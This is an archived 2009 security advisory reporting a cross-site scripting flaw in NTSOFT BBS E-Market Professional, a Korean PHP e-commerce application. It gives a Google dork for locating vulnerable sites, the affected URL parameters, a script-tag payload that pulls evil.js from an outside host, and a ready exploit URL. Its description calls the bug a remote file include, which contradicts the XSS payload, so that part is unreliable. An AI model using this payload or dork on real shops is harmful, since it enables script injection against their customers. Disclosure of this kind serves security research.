NTSOFT BBS E-Market Professional XSS

2009-07-30T00:00:00
ID PACKETSTORM:79830
Type packetstorm
Reporter Ivan Sanchez
Modified 2009-07-30T00:00:00

Description

                                        
                                            `+==========================================================================+  
+ NTSOFT BBS E-Market Professional & XSS - Remote Evil Java +  
+==========================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: BBS E-Market Professional  
  
Vendor Overview: NTSOFT  
Vendor Homepage: http://www.nt.co.kr/   
http://www.bbs2000.co.kr/  
  
Date: 29/07/2009  
  
  
"most off all korean sites that handle e-shop , e-banking,... use this software"  
  
  
Description:  
------------  
  
BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.  
  
BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The issue presents itself due to improper validation of user-supplied data.   
  
  
"In the past the same software had a lot of bugs in others parameters & versions"  
  
  
GOOGLE DORKS:  
------------  
  
intext: "Copyright (c) 2003 NTSOFT All rights reserved"  
  
  
  
Parameters affected:  
-------------------  
  
page= evil.js  
bt_code= evil.js  
b_no= evil.js  
  
  
  
Evil Code to put:  
-----------------  
  
Example: "><script src=http://site/scripts/evil.js></script>   
  
  
Example URl:  
  
http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+==========================================================================+  
+ NTSOFT BBS E-Market Professional & XSS - Remote Evil Java +  
+==========================================================================+`